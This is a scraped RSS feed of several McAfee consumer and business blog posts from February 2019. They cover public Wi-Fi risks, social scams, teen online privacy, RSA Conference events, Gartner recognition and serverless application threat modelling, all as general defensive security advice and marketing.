McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Mon, 18 Feb 2019 11:29:40 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png McAfee Blogs https://securingtomorrow.mcafee.com 32 32 The Risks of Public Wi-Fi and How to Close the Security Gap https://securingtomorrow.mcafee.com/consumer/family-safety/the-risks-of-public-wi-fi-and-how-to-close-the-security-gap/ https://securingtomorrow.mcafee.com/consumer/family-safety/the-risks-of-public-wi-fi-and-how-to-close-the-security-gap/#respond Sat, 16 Feb 2019 15:00:58 +0000 https://securingtomorrow.mcafee.com/?p=94104

As I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates. What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice […]

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

]]>

public wi-fi risksAs I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPNpublic wi-fi risks

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also allows hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN you subscribe to VPN service, download the app onto your desktop or phone, set up your account, and then log onto a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.public wi-fi risks

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/the-risks-of-public-wi-fi-and-how-to-close-the-security-gap/feed/ 0
PACE – People, Alignment, Culture, and Execution https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/pace-people-alignment-culture-and-execution/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/pace-people-alignment-culture-and-execution/#respond Fri, 15 Feb 2019 15:00:12 +0000 https://securingtomorrow.mcafee.com/?p=94178

McAfee was founded in 1987, and at 32 years old, we’re moving faster than ever before with more precision, agility, and innovation. With McAfee’s expected growth in 2019 as the device-to-cloud cybersecurity company, we recognize the need to ensure that the Americas Channel Team is sharply focused. As I’ve met with members of my team, […]

The post PACE – People, Alignment, Culture, and Execution appeared first on McAfee Blogs.

]]>

McAfee was founded in 1987, and at 32 years old, we’re moving faster than ever before with more precision, agility, and innovation. With McAfee’s expected growth in 2019 as the device-to-cloud cybersecurity company, we recognize the need to ensure that the Americas Channel Team is sharply focused. As I’ve met with members of my team, both individually and in planning sessions, we are already hitting the ground running. This year, the stage is set for our PACE—our pace within the company, and our People, Alignment, Culture, and Execution.

The first focus area, Our People, not only encompasses our team, but also our partners and customers. I truly believe if you take care of the people, the people will take care of you. As a Channel Organization, we ensure that both our partners’ and customers’ needs are met. Through tightly aligned cross-functional organizations internally, we are creating powerful unity as we serve customers together.

Our Alignment concentrates on making sure we’re moving in the same direction at the same time.

Within Our Culture, we have a primary and secondary culture. Our primary culture is centered around our pledge that each McAfee employee signs, declaring dedication to keeping the world safe from cyberthreats. However, the Channel Organization has also cultivated a secondary culture, which is supported by our corporate value surrounding candor and transparency. We aim for both cultures to be evident in everything we do.

With Our Execution, we believe that if we commit to something, we must execute it. Accountability is a priority for our team. Our Execution is currently centered around our MVISION portfolio family, which includes MVISION Endpoint, ePO, Cloud, Mobile, and EDR (coming soon). Designed to encompass our overall brand through a simple approach, MVISION is an integrated, open system from device to cloud that offers consolidated visibility, comprehension, and control across a digital landscape. If you’re not up to speed on MVISION, please take some time to research and get familiar. Our mutual customers are going to love it.

This year, we are excited to be working on our PACE. We are committed to maintaining a healthy PACE for the betterment of our customers, partners, and team. We hope the PACE we set this year will serve all who interact with McAfee.

The post PACE – People, Alignment, Culture, and Execution appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/pace-people-alignment-culture-and-execution/feed/ 0
ST01: Cloud Adoption Trends with Sekhar Sarukkai and Vittorio Viarengo https://securingtomorrow.mcafee.com/other-blogs/podcast/st01-cloud-adoption-trends-with-sekhar-sarukkai-and-vittorio-viarengo/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st01-cloud-adoption-trends-with-sekhar-sarukkai-and-vittorio-viarengo/#respond Thu, 14 Feb 2019 23:32:20 +0000 https://securingtomorrow.mcafee.com/?p=94194

Co-founder of Skyhigh Networks Sekhar Sarukkai and Head of Cloud Marketing Vittorio Viarengo discuss a range of topics from cloud adoption trends, to Office 365 security, AWS, and much more.

The post ST01: Cloud Adoption Trends with Sekhar Sarukkai and Vittorio Viarengo appeared first on McAfee Blogs.

]]>

Co-founder of Skyhigh Networks Sekhar Sarukkai and Head of Cloud Marketing Vittorio Viarengo discuss a range of topics from cloud adoption trends, to Office 365 security, AWS, and much more.

The post ST01: Cloud Adoption Trends with Sekhar Sarukkai and Vittorio Viarengo appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st01-cloud-adoption-trends-with-sekhar-sarukkai-and-vittorio-viarengo/feed/ 0
How To Sidestep Popular Social Scams https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-sidestep-popular-social-scams/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-sidestep-popular-social-scams/#respond Thu, 14 Feb 2019 22:28:16 +0000 https://securingtomorrow.mcafee.com/?p=94189

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you […]

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

]]>

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-sidestep-popular-social-scams/feed/ 0
The Best Ways to Catch McAfee at RSA Conference 2019 https://securingtomorrow.mcafee.com/business/the-best-ways-to-catch-mcafee-at-rsa-conference-2019/ https://securingtomorrow.mcafee.com/business/the-best-ways-to-catch-mcafee-at-rsa-conference-2019/#respond Thu, 14 Feb 2019 16:00:29 +0000 https://securingtomorrow.mcafee.com/?p=94126

In just a few weeks, San Francisco will be taken over by cybersecurity professionals and vendors at Moscone Center for the 2019 RSA Conference. There’s a lot packed into the conference—that’s why we’re breaking down the best ways to see McAfee in action. So take out your calendars and make note of the events below. […]

The post The Best Ways to Catch McAfee at RSA Conference 2019 appeared first on McAfee Blogs.

]]>

In just a few weeks, San Francisco will be taken over by cybersecurity professionals and vendors at Moscone Center for the 2019 RSA Conference. There’s a lot packed into the conference—that’s why we’re breaking down the best ways to see McAfee in action. So take out your calendars and make note of the events below.

McAfee Leadership Takes the Stage

CSA Summit Keynote: Case Study: Behind the Scenes of MGM Resorts’ Digital Transformation
Monday, March 4 | 11:35 am – 11:55 am | Moscone Center

Rajiv Gupta, Senior Vice President, Cloud Security Business Unit, McAfee

Scott Howitt, Senior Vice President & Chief Information Security Officer, MGM Resorts International

As a leader in their industry, MGM is transforming into a digital business by aggressively adopting the cloud to make their employees more engaged and productive and to deliver modern experiences to their customers. Join Rajiv Gupta, SVP of McAfee’s Cloud Business, and Scott Howitt, SVP and CISO for MGM Resorts International, to hear how MGM is protecting their enterprise data across the whole spectrum of their evolving infrastructure, from on-prem, to the device, to their SaaS, IaaS and PaaS cloud instances. More, here.

 

Session: #Ransomware – The Rise, Death and Resurrection of Digital Extortion
Monday, March 4 | 4:45 pm – 5:15 pm | Session Code: SEM-M03

John Fokker

Head of Cyber Investigations

Raj Samani

Chief Scientist, McAfee Fellow

 

Hear from cybercrime experts on the successes and lessons learned from the No More Ransom initiative, an online portal that has prevented millions of dollars in ransom payments to cybercriminals. Recent statistics point to a decrease in the number of ransomware variants. So, is ransomware dead? Not so fast. Get up to speed on what’s new in the ongoing effort to combat the threat of ransomware. More, here.

Keynote: Lightning in a Bottle, or Burning Down the House?
Tuesday, March 5 | 8:35 am – 8:55 am | RSA, West Stage

Dr. Celeste Fralick 

Chief Data Scientist 

Steve Grobman

Senior Vice President and Chief Technology Officer

 

Fire. In the wild, it’s a force for destruction. Controlled, it powers civilization’s forward evolution. But containing phenomena—natural or manmade—is a devilish challenge. Today’s regulatory hotspots include AI and quantum computing, because innovations that strengthen defenses can also fuel targeted threats. The weaponization of AI to amplify cyberattack impacts is enough to give anyone pause, so discussion of export controls on these and other technologies is a worthy conversation. What is the path forward to advance and protect human progress? How do we nurture sparks of innovation without burning bridges to the future? More, here.

Session: Using Machine Learning to Improve Security Predictions
Tuesday, March 5 | 11:00 am – 11:50 am | Session Code: SPO2-T06

Grant Bourzikas

Chief Information Security Officer (CISO) & Vice President of McAfee Labs Operations

 

 

 

Organizations are overwhelmed by data and dependent on outdated (nonpredictive) tools and methods. Security companies can’t keep up with the frequency of attacks, 50% of which are missed by traditional antivirus programs. In this session, McAfee’s CISO will share his experiences, providing valuable information for security organizations to predict attacks by relying on data science and machine learning. More, here.

Session: Mulitparty Vulnerability Disclosure: From Here to Where?
Wednesday, March 6 | 9:20 am – 10:10 am | Session Code: PDAC-W03

As the world grows ever more dependent on complex technological systems, the risk of broadly impactful vulnerabilities in software and hardware is driving the need for improvements in how the global ecosystem addresses identification and disclosure of those vulnerabilities. This panel will discuss what works, what doesn’t, and suggest a path forward that can benefit everyone globally. More, here.

Moderator: John Banghart, Senior Director, Venable

Panelists: Kent Landfield, Chief Standards and Technology Policy Strategist, McAfee LLC

Art Manion, Vulnerability Analysis Technical Manager, CERT Coordination Center

Audrey Plonk, Director, Global Security Policy, Intel Corporation

Session: Law Enforcement: The Secret Weapon in the CISO’s Toolkit
Friday, March 8 | 11:10 am – 12:00 pm | Session Code: AIR-F03

John Fokker

Head of Cyber Investigations

 

 

 

This session will show you how to get the most out of working with law enforcement agencies (LEA) before, during or after a security breach. Learn why partnering with law enforcement can be a valuable strategic asset in the CISO’s ever-expanding toolbox of security measures. More, here.

Hack Your Way Through the Crowds at the McAfee Booth

We’re hosting a fun and interactive Capture the Flag challenge at our RSA booth to test the investigative and analytical skills of RSA attendees. Contestants will be given various challenges and will receive “flag” details on how to complete each challenge as quickly and accurately as possible. Want to know who is in the lead? Don’t worry, we’ll have a live scoreboard. The winner of the RSA Capture the Flag contest will get bragging rights and a cool prize to take home. Visit us at booth #N5745 in the North Hall.

Cloud Security BarCade Challenge

Tuesday, March 5 | 6:00 pm – Midnight | Coin-Op Game Room, San Francisco | 508 4th Street

We’re hosting an epic cloud security networking event at Coin-Op Game Room in San Francisco! What’s the challenge? Come out to see us and find out. There will be prizes, games, food, networking, and more. Register here.

RSA After-Hours Social & Cloud Security Panels

Wednesday, March 6 | 6:30 pm – 11:00 pm | Mourad, San Francisco | 140 New Montgomery Street

We’re bringing the cloud community together for a night of networking at Mourad, so grab your peers and head over to the after-hours social. We will have a DJ, awesome food, creative libations, and a VIP area upstairs for a private whiskey tasting. Throughout the night, we’ll be hosting cloud security panels, where you’ll hear perspectives from industry experts on the current security landscape, best practices, and how to elevate your cloud security posture. Register here and join us as we close out RSA at the after-hours social of the year.

There’s a lot to look forward to at RSA 2019, so be sure to stop by booth #N5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XSU9MCAFEE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

The post The Best Ways to Catch McAfee at RSA Conference 2019 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/the-best-ways-to-catch-mcafee-at-rsa-conference-2019/feed/ 0
What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day? https://securingtomorrow.mcafee.com/consumer/what-about-a-heart-to-heart-talk-with-your-loved-ones-this-valentines-day/ https://securingtomorrow.mcafee.com/consumer/what-about-a-heart-to-heart-talk-with-your-loved-ones-this-valentines-day/#respond Wed, 13 Feb 2019 18:25:50 +0000 https://securingtomorrow.mcafee.com/?p=94171 I was listening to the Valentine’s Day playlist of my friend when suddenly espied one of my favorites- Ain’t No Mountain High Enough and started humming the song. Remember it? If you need me call me No matter where you are No matter how far; Just call my name I’ll be there in a hurry […]

The post What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day? appeared first on McAfee Blogs.

]]>
I was listening to the Valentine’s Day playlist of my friend when suddenly espied one of my favorites- Ain’t No Mountain High Enough and started humming the song. Remember it?

If you need me call me

No matter where you are

No matter how far;

Just call my name

I’ll be there in a hurry

You don’t have to worry coz

Baby there ain’t any mountain high enough…

To keep me from getting to you.

Post becoming a mom, it resonated more with me and I would often find myself singing the song whilst doing my daily chores. (Hope the kids heard me and remember the words!).

In the digital age, when kids are maturing faster and social media reflects the rapid rate at which hearts are getting connected and then disconnected, it’s important that we talk about online romances, dating sites and privacy with our teens.

Is your teen sporting a moony look and walking around as if on cloud 9? Then it’s time to sit them down and have ‘the talk’- the one about crushes, love and the need for separating digital life from their romantic life.

So how do you go about it? You can start on a light note, discussing Valentine’s Day and the number of roses they may have received or gifted. Talk about their friends and the various plans they are making for this special day. You may then gently lead the conversation to online romances and the rising interest in dating websites among adolescents. Finally, it’s time to discuss account security and privacy.

Here are some tips you can share with your kids during your heart-to-heart talk on digital age romance:

  • Whisper sweet nothings in each other’s ears but not your account passwords
  • Share your hobbies and dreams, but keep your sensitive information private
  • Make new friends online but only as long as the conversation stays decent and non-intrusive
  • Use PIN or biometrics to lock your devices. Set autolock to 10 sec
  • Money attracts the attention of cyber criminals like nothing else. Avoid making online payments to help out a friend seemingly in distress, without consulting someone senior and trusted. Be judicious – do not share ATM PIN or credit card CVV number
  • Take time to decide whether or not you want to create a common social media account and avoid if possible. You wouldn’t have the control over posting
  • If your social media account is compromised, write a general post informing all about it, take screenshots of offending content and delete account
  • Use only secured devices with authentic software -This is to be implemented without fail by all family members

Isn’t it also a good time to talk to kids about real love – The love that isn’t limited to romance? Love is also when Mom gets up at midnight to make a studious child a cup of hot chocolate; when Dad forgoes his annual vacation plans to buy a collegian a dream laptop; when friends make plans to spend maximum time possible with a depressed friend; when a teacher spends extra time helping a child improve grades; when a 4-year old makes and proudly serves her Mom a cup of tea. Love is all that and more.

Recently Safer Internet Day was celebrated worldwide and I am really happy to note that not only security firms, government agencies and experts, but even schools, media and various NGOs showed support through activities, slogans, posts and discussions. Though the number is still insignificant, if you consider that we are a billion plus nation, it’s a start. Awareness of the issue and commitment to be a changemaker are the first two steps towards a positive digital life.

Here are some DIY ideas for your child for Valentine’s Day:

  1. Make cards for near and dear ones, showing appreciation and love
  2. Make and hang heart chains to decorate their rooms/the house
  3. Get flowers and chocolates for grandparents, domestic help, school bus drivers, canteen staff etc. to thank them for their support
  4. Compose poems and songs mentioning each loved one and sing it at the next social meet
  5. Visit a children’s hospital with parents and share cards and small gifts

These activities will not only boost their creativity and realization of real relationsships, but will also help them lead a balanced digital life.

Happy Valentine’s Day to you all!

The post What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/what-about-a-heart-to-heart-talk-with-your-loved-ones-this-valentines-day/feed/ 0
Kicking off 2019 with Recognition Across the McAfee Portfolio https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/ https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/#respond Tue, 12 Feb 2019 14:00:01 +0000 https://securingtomorrow.mcafee.com/?p=94143

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude […]

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

]]>

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude of technologies. Excellence that we believe is validated by our larger peer and analyst community.

We’ve just announced that McAfee was named a Gartner Peer Insights Customers’ Choice for another two technologies. Our customers have recognized us as a January 2019 Gartner Peer Insights Customers’ Choice for Secure Web Gateway for McAfee Web Protection, McAfee Web Gateway, and McAfee WebGateway Cloud Service. In addition, for the second year in a row McAfee’s MVISION Cloud (formerly McAfee Skyhigh Security Cloud) was named a January 2019 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In 2018, McAfee was the only vendor named a Customers’ Choice in the Cloud Access Security Brokers market.

Our team at McAfee takes great pride in these distinctions, as customer feedback is essential in shaping our products and services. We put our customers at the core of everything we do and this shows pervasively across our portfolio. We believe our position as a Gartner Peer Insights Customers’ Choice for Secure Web Gateway, Data Loss Prevention, SIEM, Endpoint Protection and Cloud Access Security Broker (CASB) is a testament to the strength of our device-to-cloud strategy. This adds up to recognition’s in the last year in five different markets.

We also think it’s a signal of the way enterprises are approaching security – with the innovative technology solutions and integrated strategies that must evolve to fight a threat that is constantly evolving, too.

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/feed/ 0
The Exploit Model of Serverless Cloud Applications https://securingtomorrow.mcafee.com/business/cloud-security/the-exploit-model-of-serverless-cloud-applications/ https://securingtomorrow.mcafee.com/business/cloud-security/the-exploit-model-of-serverless-cloud-applications/#respond Mon, 11 Feb 2019 15:00:02 +0000 https://securingtomorrow.mcafee.com/?p=94091

Serverless platform-as-a-service (PaaS) offerings are being deployed at an increasing rate for many reasons. They relate to information in a myriad of ways, unlocking new opportunities to collect data, identify data, and ultimately find ways to transform data to value. Figure 1. Serverless application models. Serverless applications can cost-effectively reply and process information at scale, returning […]

The post The Exploit Model of Serverless Cloud Applications appeared first on McAfee Blogs.

]]>

Serverless platform-as-a-service (PaaS) offerings are being deployed at an increasing rate for many reasons. They relate to information in a myriad of ways, unlocking new opportunities to collect data, identify data, and ultimately find ways to transform data to value.

Figure 1. Serverless application models.

Serverless applications can cost-effectively reply and process information at scale, returning critical data models and transformations synchronously to browsers or mobile devices. Synchronous serverless applications unlock mobile device interactions and near-real-time processing for on-the-go insights.

Asynchronous serverless applications can create data sets and views on large batches of data over time. We previously needed to have every piece of data and run batch reports, but we now have the ability to stagger events, or even make requests, wait some time to check in on them, and get results that bring value to the organization a few minutes or an hour later.

Areas as diverse as tractors, manufacturing, and navigation are benefiting from the ability to stream individual data points and look for larger relationships. These streams build value out of small bits of data. Individually they’re innocuous and of minimal value, but together they provide new intelligence we struggled to capture before.

The key theme throughout these models is the value of the underlying data. Protecting this data, while still using it to create value becomes a critical objective for the cloud-transforming enterprise. We can start by looking at the model for how data moves into and out of the application. A basic access and data model illustrates the way the application, access medium, CSP provider security, and serverless PaaS application have to work together to balance protection and capability.

Figure 2. Basic access and data model for serverless applications.

A deeper exploration of the security environment—and the shared responsibility in cloud security—forces us to look more carefully at who is involved, and how each party in the cloud ecosystem is empowered to see potential threats to the environment, and to the transaction specifically. When we expand the access and data model to look at the activities in a modern synchronous serverless application, we can see how the potential threats expand rapidly.

Figure 3. Expanded access and data model for a synchronous serverless application.

Organizations using this common model for an integrated serverless PaaS application are also gaining information from infrastructure-as-a-service (IaaS) elements in the environment. This leads to a more specific view of the threats that exist:

Figure 4. Sample threats in a serverless application.

 

By pushing the information security team to more carefully and specifically consider the ways the application can be exploited, they can then take simple actions to ensure that both development activities and the architecture for the application itself offer protection. A few examples:

  • Threat: Network sniffing/MITM
  • Protection: High integrity TLS, with signed API requests and responses

 

  • Threat: Code exploit
  • Protection: Code review, and SAST/pen testing on regular schedule

 

  • Threat: Data structure exploit
  • Protection: API forced data segmentation and request limiting, managed data model

The organization first must recognize the potential risk, make it part of the culture to ask the question, “What threats to my data does my change or new widget introduce?” and make it an expectation of deployment that privacy and security demand a response.

Otherwise, your intellectual property may just become the foundation of someone else’s profit.

The post The Exploit Model of Serverless Cloud Applications appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/the-exploit-model-of-serverless-cloud-applications/feed/ 0
Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You? https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/personal-data-and-you/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/personal-data-and-you/#respond Mon, 11 Feb 2019 14:00:48 +0000 https://securingtomorrow.mcafee.com/?p=94098

A classic meet-cute – the moment where two people, destined to be together, meet for the first time. This rom-com cornerstone is turned on its head by Netflix’s latest bingeable series “You.” For those who have watched, we have learned two things. One, never trust someone who is overly protective of their basement. And two, […]

The post Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You? appeared first on McAfee Blogs.

]]>

A classic meet-cute – the moment where two people, destined to be together, meet for the first time. This rom-com cornerstone is turned on its head by Netflix’s latest bingeable series “You.” For those who have watched, we have learned two things. One, never trust someone who is overly protective of their basement. And two, in the era of social media and dating apps, it’s incredibly easy to take advantage of the amount of personal data consumers readily, and somewhat naively, share online and with the cloud every day.

We first meet Joe Goldberg and Guinevere Beck – the show’s lead characters – in a bookstore, she’s looking for a book, he’s a book clerk. They flirt, she buys a book, he learns her name. For all intents and purposes, this is where their story should end – but it doesn’t. With a simple search of her name, Joe discovers the world of Guinevere Beck’s social media channels, all conveniently set to public. And before we know it, Joe has made himself a figurative rear-window into Beck’s life, which brings to light the dangers of social media and highlights how a lack of digital privacy could put users in situations of unnecessary risk. With this information on Beck, Joe soon becomes both a physical and digital stalker, even managing to steal her phone while trailing her one day, which as luck would have it, is not password protected. From there, Joe follows her every text, plan and move thanks to the cloud.

Now, while Joe and Beck’s situation is unique (and a tad dramatized), the amount of data exposed via their interactions could potentially occur through another romantic avenue – online dating. Many millennial couples meet on dating sites where users are invited to share personal anecdotes, answer questions, and post photos of themselves. The nature of these apps is to get to know a stranger better, but the amount of personal information we choose to share can create security risks. We have to be careful as the line between creepy and cute quickly blurs when users can access someone’s every status update, tweet, and geotagged photo.

While “You” is an extreme case of social media gone wrong, dating app, social media, and cloud usage are all very predominant in 2019. Therefore, if you’re a digital user, be sure to consider these precautions:

  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public, so turn your profiles to private in order to have control over who can follow you. Take it a step further and go into your app settings to control which apps you want to share your location with and which ones you don’t.
  • Use a screen name for social media accounts. If you don’t want a simple search of your name on Google to lead to all your social media accounts, consider using a different variation of your real name.
  • Watch what you post. Before tagging your friends or location on Instagram and posting your location on Facebook, think about what this private information reveals about you publicly and how it could be used by a third-party.
  • Use strong passwords. In the chance your data does become exposed, or your device is stolen, a strong, unique password can help prevent your accounts from being hacked.
  • Leverage two-factor authentication. Remember to always implement two-factor authentication to add an extra layer of security to your device. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.
  • Use the cloud with caution. If you plan to store your data in the cloud, be sure to set up an additional layer of access security (one way of doing this is through two-factor authentication) so that no one can access the wealth of information your cloud holds. If your smartphone is lost or stolen, you can access your password protected cloud account to lock third-parties out of your device, and more importantly your personal data.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/personal-data-and-you/feed/ 0
